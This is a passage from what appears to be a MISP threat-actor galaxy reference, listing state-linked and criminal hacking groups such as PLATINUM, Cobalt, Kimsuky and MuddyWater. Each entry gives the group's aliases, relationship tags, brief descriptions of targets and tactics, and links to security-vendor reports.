  • Butterfly

  • Morpho

  • Sphinx Moth

Table 11866. Table References

Links

https://www.symantec.com/connect/blogs/butterfly-profiting-high-level-corporate-attacks

https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/

https://research.kudelskisecurity.com/2015/11/05/sphinx-moth-expanding-our-knowledge-of-the-wild-neutron-morpho-apt/

https://blog.twitter.com/official/en_us/a/2013/keeping-our-users-secure.html

https://www.facebook.com/notes/facebook-security/protecting-people-on-facebook/10151249208250766

https://www.reuters.com/article/us-apple-hackers/exclusive-apple-macs-hit-by-hackers-who-targeted-facebook-idUSBRE91I10920130219

https://blogs.technet.microsoft.com/msrc/2013/02/22/recent-cyberattacks/

PLATINUM

PLATINUM has been targeting its victims since at least as early as 2009, and may have been active for several years prior. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons, and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defense institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The group’s persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat.

The tag is: misp-galaxy:threat-actor="PLATINUM"

PLATINUM is also known as:

  • TwoForOne

  • G0068

  • ATK33

PLATINUM has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="PLATINUM - G0068" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="PLATINUM" with estimative-language:likelihood-probability="likely"

Table 11867. Table References

Links

http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf

https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/

https://attack.mitre.org/groups/G0068/

RASPITE

Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE. Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicates the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time. RASPITE leverages strategic website compromise to gain initial access to target networks. RASPITE uses the same methodology as DYMALLOY and ALLANITE in embedding a link to a resource to prompt an SMB connection, from which it harvests Windows credentials. The group then deploys install scripts for a malicious service to beacon back to RASPITE-controlled infrastructure, allowing the adversary to remotely access the victim machine.

The tag is: misp-galaxy:threat-actor="RASPITE"

RASPITE is also known as:

  • LeafMiner

  • Raspite

Table 11868. Table References

Links

https://dragos.com/blog/20180802Raspite.html

https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east

https://attack.mitre.org/groups/G0077/

FIN8

FIN8 is a financially motivated group targeting the retail, hospitality and entertainment industries. The actor had previously conducted several tailored spearphishing campaigns using the downloader PUNCHBUGGY and POS malware PUNCHTRACK.

The tag is: misp-galaxy:threat-actor="FIN8"

FIN8 is also known as:

  • ATK113

  • G0061

FIN8 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="FIN8 - G0061" with estimative-language:likelihood-probability="likely"

Table 11869. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html

https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html

https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf

https://afyonluoglu.org/PublicWebFiles/Reports-TR/2017%20FireEye%20M-Trends%20Report.pdf

https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html

https://attack.mitre.org/groups/G0061

El Machete

El Machete is one of these threats that was first publicly disclosed and named by Kaspersky here. We’ve found that this group has continued to operate successfully, predominantly in Latin America, since 2014. All attackers simply moved to new C2 infrastructure, based largely around dynamic DNS domains, in addition to making minimal changes to the malware in order to evade signature-based detection.

The tag is: misp-galaxy:threat-actor="El Machete"

El Machete is also known as:

  • Machete

  • machete-apt

  • APT-C-43

  • G0095

El Machete has relationships with:

  • similar: misp-galaxy:360net-threat-actor="Machete - APT-C-43" with estimative-language:likelihood-probability="likely"

Table 11870. Table References

Links

https://attack.mitre.org/groups/G0095/

https://securelist.com/el-machete/66108/

https://www.cylance.com/en_us/blog/el-machete-malware-attacks-cut-through-latam.html

https://www.cfr.org/interactive/cyber-operations/machete

https://threatvector.cylance.com/en_us/home/el-machete-malware-attacks-cut-through-latam.html

https://blog.360totalsecurity.com/en/apt-c-43-steals-venezuelan-military-secrets-to-provide-intelligence-support-for-the-reactionaries-hpreact-campaign/

Cobalt

A criminal group dubbed Cobalt is behind synchronized ATM heists that saw machines across Europe, CIS countries (including Russia), and Malaysia being raided simultaneously, in the span of a few hours. The group has been active since June 2016, and their latest attacks happened in July and August.

The tag is: misp-galaxy:threat-actor="Cobalt"

Cobalt is also known as:

  • Cobalt Group

  • Cobalt Gang

  • GOLD KINGSWOOD

  • COBALT SPIDER

  • G0080

  • Mule Libra

Table 11871. Table References

Links

https://www.helpnetsecurity.com/2016/11/22/cobalt-hackers-synchronized-atm-heists/

https://www.bleepingcomputer.com/news/security/cobalt-hacking-group-tests-banks-in-russia-and-romania/

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-september-cobalt-spider/

https://www.group-ib.com/blog/cobalt

https://www.reuters.com/article/us-taiwan-cyber-atms/taiwan-atm-heist-linked-to-european-hacking-spree-security-firm-idUSKBN14P0CX

https://www.proofpoint.com/us/threat-insight/post/microsoft-word-intruder-integrates-cve-2017-0199-utilized-cobalt-group-target

https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/

https://www.riskiq.com/blog/labs/cobalt-strike/

https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/

https://unit42.paloaltonetworks.com/unit42-new-techniques-uncover-attribute-cobalt-gang-commodity-builders-infrastructure-revealed/

https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain

https://www.computerweekly.com/news/252446153/Three-Carbanak-cyber-heist-gang-members-arrested

https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf

https://attack.mitre.org/groups/G0080/

http://www.secureworks.com/research/threat-profiles/gold-kingswood

https://unit42.paloaltonetworks.com/atoms/mulelibra/

TA459

The tag is: misp-galaxy:threat-actor="TA459"

TA459 is also known as:

  • G0062

TA459 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="TA459 - G0062" with estimative-language:likelihood-probability="likely"

Table 11872. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts

https://attack.mitre.org/groups/G0062/

Cyber Berkut

The tag is: misp-galaxy:threat-actor="Cyber Berkut"

Table 11873. Table References

Links

https://www.threatconnect.com/blog/russia-hacks-bellingcat-mh17-investigation/.V-wnrubaeEU.twitter

Tonto Team

Tonto Team is a Chinese-speaking APT group that has been active since at least 2013. They primarily target military, diplomatic, and infrastructure organizations in Asia and Eastern Europe. The group has been observed using various malware, including the Bisonal RAT and ShadowPad. They employ spear-phishing emails with malicious attachments as their preferred method of distribution.

The tag is: misp-galaxy:threat-actor="Tonto Team"

Tonto Team is also known as:

  • CactusPete

  • KARMA PANDA

  • BRONZE HUNTLEY

  • COPPER

  • Red Beifang

  • G0131

  • PLA Unit 65017

  • Earth Akhlut

  • TAG-74

Table 11874. Table References

Links

https://arstechnica.com/information-technology/2017/04/researchers-claim-china-trying-to-hack-south-korea-missile-defense-efforts/

https://docs.huihoo.com/rsaconference/usa-2014/anf-t07b-the-art-of-attribution-identifying-and-pursuing-your-cyber-adversaries-final.pdf

https://securelist.com/cactuspete-apt-groups-updated-bisonal-backdoor/97962/

https://www.wsj.com/articles/chinas-secret-weapon-in-south-korea-missile-fight-hackers-1492766403

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html

https://www.sentinelone.com/labs/targets-of-interest-russian-organizations-increasingly-under-attack-by-chinese-apts/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0919.pdf

https://www.recordedfuture.com/multi-year-chinese-apt-campaign-targets-south-korean-academic-government-political-entities

Danti

The tag is: misp-galaxy:threat-actor="Danti"

Table 11875. Table References

Links

https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/

APT5

We have observed one APT group, which we call APT5, particularly focused on telecommunications and technology companies. More than half of the organizations we have observed being targeted or breached by APT5 operate in these sectors. Several times, APT5 has targeted organizations and personnel based in Southeast Asia. APT5 has been active since at least 2007. It appears to be a large threat group that consists of several subgroups, often with distinct tactics and infrastructure. APT5 has targeted or breached organizations across multiple industries, but its focus appears to be on telecommunications and technology companies, especially information about satellite communications. APT5 targeted the network of an electronics firm that sells products for both industrial and military applications. The group subsequently stole communications related to the firm’s business relationship with a national military, including inventories and memoranda about specific products they provided. In one case in late 2014, APT5 breached the network of an international telecommunications company. The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company’s relationships with other telecommunications companies.

The tag is: misp-galaxy:threat-actor="APT5"

APT5 is also known as:

  • KEYHOLE PANDA

  • MANGANESE

  • BRONZE FLEETWOOD

  • TEMP.Bottle

  • Mulberry Typhoon

  • Poisoned Flight

APT5 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Mulberry Typhoon" with estimative-language:likelihood-probability="likely"

Table 11876. Table References

Links

https://www.fireeye.com/current-threats/apt-groups.html

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-southeast-asia-threat-landscape.pdf

https://www.secureworks.com/research/threat-profiles/bronze-fleetwood

https://www.mandiant.com/resources/insights/apt-groups

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWMFIi

http://internal-www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html

Tick

Tick is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group appears to have close ties to the Chinese National University of Defense and Technology, which is possibly linked to the PLA. This threat actor targets organizations in the critical infrastructure, heavy industry, manufacturing, and international relations sectors for espionage purposes. The attacks appear to be centered on political, media, and engineering sectors. STALKER PANDA has been observed conducting targeted attacks against Japan, Taiwan, Hong Kong, and the United States.

The tag is: misp-galaxy:threat-actor="Tick"

Tick is also known as:

  • Nian

  • BRONZE BUTLER

  • REDBALDKNIGHT

  • STALKER PANDA

  • G0060

  • Stalker Taurus

  • PLA Unit 61419

Tick has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="BRONZE BUTLER - G0060" with estimative-language:likelihood-probability="likely"

Table 11877. Table References

Links

https://wikileaks.org/vault7/document/2015-08-20150814-256-CSIR-15005-Stalker-Panda/2015-08-20150814-256-CSIR-15005-Stalker-Panda.pdf

https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan

https://www.secureworks.jp/resources/rp-bronze-butler

https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/

http://blog.jpcert.or.jp/2017/08/detecting-datper-malware-from-proxy-logs.html

https://www.cfr.org/interactive/cyber-operations/bronze-butler

https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses

https://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/

https://attack.mitre.org/groups/G0060/

https://www.secureworks.com/research/threat-profiles/bronze-butler

https://unit42.paloaltonetworks.com/atoms/stalkertaurus/

https://twitter.com/iiyonite/status/1384431491485155331

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

APT26

The tag is: misp-galaxy:threat-actor="APT26"

APT26 is also known as:

  • JerseyMikes

  • TURBINE PANDA

  • BRONZE EXPRESS

  • TECHNETIUM

APT26 has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Turla - G0010" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Turla" with estimative-language:likelihood-probability="likely"

Table 11878. Table References

Links

https://www.secureworks.com/research/threat-profiles/bronze-express

https://www.uscc.gov/sites/default/files/2022-02/Adam_Kozy_Testimony.pdf

https://www.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

SABRE PANDA

The tag is: misp-galaxy:threat-actor="SABRE PANDA"

Table 11879. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

BIG PANDA

The tag is: misp-galaxy:threat-actor="BIG PANDA"

Table 11880. Table References

Links

http://www.darkreading.com/attacks-and-breaches/crowdstrike-falcon-traces-attacks-back-to-hackers/d/d-id/1110402?

POISONUS PANDA

The tag is: misp-galaxy:threat-actor="POISONUS PANDA"

Table 11881. Table References

Links

https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492182276.pdf

TEMP.Hermit

The tag is: misp-galaxy:threat-actor="TEMP.Hermit"

Table 11883. Table References

Links

https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html

EvilPost

The tag is: misp-galaxy:threat-actor="EvilPost"

Table 11886. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

TEST PANDA

The tag is: misp-galaxy:threat-actor="TEST PANDA"

Table 11887. Table References

Links

http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem

Madi

Kaspersky Lab and Seculert worked together to sinkhole the Madi Command & Control (C&C) servers to monitor the campaign. Kaspersky Lab and Seculert identified more than 800 victims located in Iran, Israel and select countries across the globe connecting to the C&Cs over the past eight months. Statistics from the sinkhole revealed that the victims were primarily business people working on Iranian and Israeli critical infrastructure projects, Israeli financial institutions, Middle Eastern engineering students, and various government agencies communicating in the Middle East. Common applications and websites that were spied on include accounts on Gmail, Hotmail, Yahoo! Mail, ICQ, Skype, Google+, and Facebook. Surveillance is also performed over integrated ERP/CRM systems, business contracts, and financial management systems.

The tag is: misp-galaxy:threat-actor="Madi"

Table 11888. Table References

Links

https://securelist.com/the-madi-campaign-part-i-5/33693/

https://securelist.com/the-madi-campaign-part-ii-53/33701/

https://www.cfr.org/interactive/cyber-operations/madi

https://www.kaspersky.com/about/press-releases/2012_kaspersky-lab-and-seculert-announce—​madi—​a-newly-discovered-cyber-espionage-campaign-in-the-middle-east

https://threatpost.com/new-and-improved-madi-spyware-campaign-continues-072512/76849/

https://web.archive.org/web/20120718173322/https://www.symantec.com/connect/blogs/madi-attacks-series-social-engineering-campaigns

ELECTRIC PANDA

The tag is: misp-galaxy:threat-actor="ELECTRIC PANDA"

Table 11889. Table References

Links

http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem

Kimsuky

This threat actor targets South Korean think tanks, industry, nuclear power operators, and the Ministry of Unification for espionage purposes.

The tag is: misp-galaxy:threat-actor="Kimsuky"

Kimsuky is also known as:

  • Velvet Chollima

  • Black Banshee

  • Thallium

  • Operation Stolen Pencil

  • G0086

  • APT43

  • Emerald Sleet

  • THALLIUM

Kimsuky has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Emerald Sleet" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:rat="xRAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="xrat" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:ransomware="XRat" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="XRat" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="QUASARRAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:rat="Quasar RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="Quasar RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-tool="QuasarRAT - S0262" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="RDP Wrapper" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="TinyNuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:banker="TinyNuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="TightVNC" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:rat="Chrome Remote Desktop" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="BabyShark" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="BabyShark" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-malware="BabyShark - S0414" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="RevClient" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Kimsuky - G0094" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Kimsuky" with estimative-language:likelihood-probability="likely"

Table 11891. Table References

Links

https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/

https://www.cfr.org/interactive/cyber-operations/kimsuky

https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html

https://youtu.be/hAsKp43AZmM?t=1027

https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1

https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

https://attack.mitre.org/groups/G0086/

https://us-cert.cisa.gov/ncas/alerts/aa20-301a

https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

https://asec.ahnlab.com/en/57873/

https://asec.ahnlab.com/en/61082/

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-north-korean-apt-kimsuky-aka-black-banshee-active-iocs-29/

https://www.sentinelone.com/labs/a-glimpse-into-future-scarcruft-campaigns-attackers-gather-strategic-intelligence-and-target-cybersecurity-professionals/

Snake Wine

While investigating some of the smaller name servers that APT28/Sofacy routinely use to host their infrastructure, Cylance discovered another prolonged campaign that appeared to exclusively target Japanese companies and individuals that began around August 2016. The later registration style was eerily close to previously registered APT28 domains; however, the malware used in the attacks did not seem to line up at all. During the course of our investigation, JPCERT published this analysis of one of the group’s backdoors. Cylance tracks this threat group internally as ‘Snake Wine’. The Snake Wine group has proven to be highly adaptable and has continued to adopt new tactics in order to establish footholds inside victim environments. The exclusive interest in Japanese government, education, and commerce will likely continue into the future as the group is just starting to build and utilize its current attack infrastructure.

The tag is: misp-galaxy:threat-actor="Snake Wine"

Table 11892. Table References

Links

https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html

https://threatvector.cylance.com/en_us/home/the-deception-project-a-new-japanese-centric-threat.html

https://www.jpcert.or.jp/magazine/acreport-ChChes.html

Careto

This threat actor targets governments, diplomatic missions, private companies in the energy sector, and academics for espionage purposes. The Mask is an advanced threat actor that has been involved in cyber-espionage operations since at least 2007. The name "Mask" comes from the Spanish slang word "Careto" ("Ugly Face" or “Mask”) which the authors included in some of the malware modules. More than 380 unique victims in 31 countries have been observed to date. What makes “The Mask” special is the complexity of the toolset used by the attackers. This includes an extremely sophisticated malware, a rootkit, a bootkit, 32- and 64-bit Windows versions, Mac OS X and Linux versions and possibly versions for Android and iPad/iPhone (Apple iOS).

The tag is: misp-galaxy:threat-actor="Careto"

Careto is also known as:

  • The Mask

  • Mask

  • Ugly Face

Table 11893. Table References

Links

https://securelist.com/the-caretomask-apt-frequently-asked-questions/58254/

https://www.cfr.org/interactive/cyber-operations/careto

https://d2538mqrb7brka.cloudfront.net/wp-content/uploads/sites/43/2018/03/20133638/unveilingthemask_v1.0.pdf

GIBBERISH PANDA

The tag is: misp-galaxy:threat-actor="GIBBERISH PANDA"

Table 11894. Table References

Links

http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem

OnionDog

This threat actor targets the South Korean government, transportation, and energy sectors.

The tag is: misp-galaxy:threat-actor="OnionDog"

Table 11895. Table References

Links

http://news.softpedia.com/news/korean-energy-and-transportation-targets-attacked-by-oniondog-apt-501534.shtml

https://www.cfr.org/interactive/cyber-operations/onion-dog

Clever Kitten

The tag is: misp-galaxy:threat-actor="Clever Kitten"

Clever Kitten is also known as:

  • Group 41

Clever Kitten has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Cleaver - G0003" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cutting Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Cleaver" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="OilRig" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="CHRYSENE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-intrusion-set="Magic Hound - G0059" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Flying Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Charming Kitten" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:threat-actor="Rocket Kitten" with estimative-language:likelihood-probability="likely"

Table 11896. Table References

Links

http://www.crowdstrike.com/blog/whois-clever-kitten/

Cyber Caliphate Army

The tag is: misp-galaxy:threat-actor="Cyber Caliphate Army"

Cyber Caliphate Army is also known as:

  • Islamic State Hacking Division

  • CCA

  • United Cyber Caliphate

  • UUC

  • CyberCaliphate

Table 11898. Table References

Links

https://en.wikipedia.org/wiki/Islamic_State_Hacking_Division

https://ent.siteintelgroup.com/index.php?option=com_customproperties&view=search&task=tag&bind_to_category=content:37&tagId=697

MAGNETIC SPIDER

The tag is: misp-galaxy:threat-actor="MAGNETIC SPIDER"

Table 11899. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

Cyber fighters of Izz Ad-Din Al Qassam

The tag is: misp-galaxy:threat-actor="Cyber fighters of Izz Ad-Din Al Qassam"

Cyber fighters of Izz Ad-Din Al Qassam is also known as:

  • Fraternal Jackal

Table 11901. Table References

Links

http://pastebin.com/u/QassamCyberFighters

http://ddanchev.blogspot.com.es/2012/09/dissecting-operation-ababil-osint.html

APT6

The FBI issued a rare bulletin admitting that a group named Advanced Persistent Threat 6 (APT6) hacked into US government computer systems as far back as 2011 and for years stole sensitive data. The FBI alert was issued in February and went largely unnoticed. Nearly a month later, security experts are now shining a bright light on the alert and the mysterious group behind the attack. “This is a rare alert and a little late, but one that is welcomed by all security vendors as it offers a chance to mitigate their customers and also collaborate further in what appears to be an ongoing FBI investigation,” said Deepen Desai, director of security research at the security firm Zscaler in an email to Threatpost. Details regarding the actual attack and what government systems were infected are scant. Government officials said they knew the initial attack occurred in 2011, but are unaware of who specifically is behind the attacks. “Given the nature of malware payload involved and the duration of this compromise being unnoticed – the scope of lateral movement inside the compromised network is very high possibly exposing all the critical systems,” Deepen said.

The tag is: misp-galaxy:threat-actor="APT6"

APT6 is also known as:

  • 1.php Group

Table 11902. Table References

Links

https://threatpost.com/fbi-quietly-admits-to-multi-year-apt-attack-sensitive-data-stolen/117267/

White Bear

As a part of our Kaspersky APT Intelligence Reporting subscription, customers received an update in mid-February 2017 on some interesting APT activity that we called WhiteBear. Much of the contents of that report are reproduced here. WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report “Skipper Turla – the White Atlas framework” from mid-2016. Like previous Turla activity, WhiteBear leverages compromised websites and hijacked satellite connections for command and control (C2) infrastructure. As a matter of fact, WhiteBear infrastructure has overlap with other Turla campaigns, like those deploying Kopiluwak, as documented in “KopiLuwak – A New JavaScript Payload from Turla” in December 2016. WhiteBear infected systems maintained a dropper (which was typically signed) as well as a complex malicious platform which was always preceded by WhiteAtlas module deployment attempts. However, despite the similarities to previous Turla campaigns, we believe that WhiteBear is a distinct project with a separate focus. We note that this observation of delineated target focus, tooling, and project context is an interesting one that also can be repeated across broadly labeled Turla and Sofacy activity. From February to September 2016, WhiteBear activity was narrowly focused on embassies and consular operations around the world. All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations. Continued WhiteBear activity later shifted to include defense-related organizations into June 2017. When compared to WhiteAtlas infections, WhiteBear deployments are relatively rare and represent a departure from the broader Skipper Turla target set. Additionally, a comparison of the WhiteAtlas framework to WhiteBear components indicates that the malware is the product of separate development efforts. WhiteBear infections appear to be preceded by a condensed spearphishing dropper, lack Firefox extension installer payloads, and contain several new components signed with a new code signing digital certificate, unlike WhiteAtlas incidents and modules.

The tag is: misp-galaxy:threat-actor="White Bear"

White Bear is also known as:

  • Skipper Turla

Table 11906. Table References

Links

https://securelist.com/introducing-whitebear/81638/

https://www.cfr.org/interactive/cyber-operations/whitebear

PALE PANDA

The tag is: misp-galaxy:threat-actor="PALE PANDA"

Table 11907. Table References

Links

http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf

Mana Team

The tag is: misp-galaxy:threat-actor="Mana Team"

Table 11908. Table References

Links

http://webcache.googleusercontent.com/search?q=cache:TWoHHzH9gU0J:en.hackdig.com/02/39538.htm

Sowbug

Sowbug has been conducting highly targeted cyber attacks against organizations in South America and Southeast Asia and appears to be heavily focused on foreign policy institutions and diplomatic targets. Sowbug has been seen mounting classic espionage attacks by stealing documents from the organizations it infiltrates.

The tag is: misp-galaxy:threat-actor="Sowbug"

Sowbug is also known as:

  • G0054

Sowbug has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="Sowbug - G0054" with estimative-language:likelihood-probability="likely"

Table 11909. Table References

Links

https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

https://www.cfr.org/interactive/cyber-operations/sowbug

https://attack.mitre.org/groups/G0054/

MuddyWater

The MuddyWater attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call “POWERSTATS”. Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.

The tag is: misp-galaxy:threat-actor="MuddyWater"

MuddyWater is also known as:

  • TEMP.Zagros

  • Static Kitten

  • Seedworm

  • MERCURY

  • COBALT ULSTER

  • G0069

  • ATK51

  • Boggy Serpens

  • Mango Sandstorm

  • TA450

MuddyWater has relationships with:

  • similar: misp-galaxy:mitre-intrusion-set="MuddyWater - G0069" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Mango Sandstorm" with estimative-language:likelihood-probability="likely"

Table 11910. Table References

Links

https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/

https://www.cfr.org/interactive/cyber-operations/muddywater

https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html

https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/

https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/

https://securelist.com/muddywater/88059/

https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group

https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf

https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/

https://blog.talosintelligence.com/2019/05/recent-muddywater-associated-blackwater.html

https://www.zdnet.com/article/new-leaks-of-iranian-cyber-espionage-operations-hit-telegram-and-the-dark-web/

https://attack.mitre.org/groups/G0069/

http://www.secureworks.com/research/threat-profiles/cobalt-ulster

https://unit42.paloaltonetworks.com/atoms/boggyserpens/

https://www.sentinelone.com/blog/the-new-frontline-of-geopolitics-understanding-the-rise-of-state-sponsored-cyber-attacks/

MoneyTaker

In less than two years, this group has conducted over 20 successful attacks on financial institutions and legal firms in the USA, UK and Russia. The group has primarily been targeting card processing systems, including the AWS CBR (Russian Interbank System) and purportedly SWIFT (US). Given the wide usage of STAR in LATAM, financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group.

The tag is: misp-galaxy:threat-actor="MoneyTaker"

Table 11911. Table References

Links

https://www.bleepingcomputer.com/news/security/moneytaker-hacker-group-steals-millions-from-us-and-russian-banks/

https://www.group-ib.com/blog/moneytaker

Dark Caracal

Lookout and Electronic Frontier Foundation (EFF) have discovered Dark Caracal, a persistent and prolific actor, who at the time of writing is believed to be administered out of a building belonging to the Lebanese General Security Directorate in Beirut. At present, we have knowledge of hundreds of gigabytes of exfiltrated data, in 21+ countries, across thousands of victims. Stolen data includes enterprise intellectual property and personally identifiable information.

The tag is: misp-galaxy:threat-actor="Dark Caracal"

Dark Caracal is also known as:

  • G0070

Table 11912. Table References

Links

https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf

https://research.checkpoint.com/2020/bandook-signed-delivered

https://attack.mitre.org/groups/G0070/

Nexus Zeta

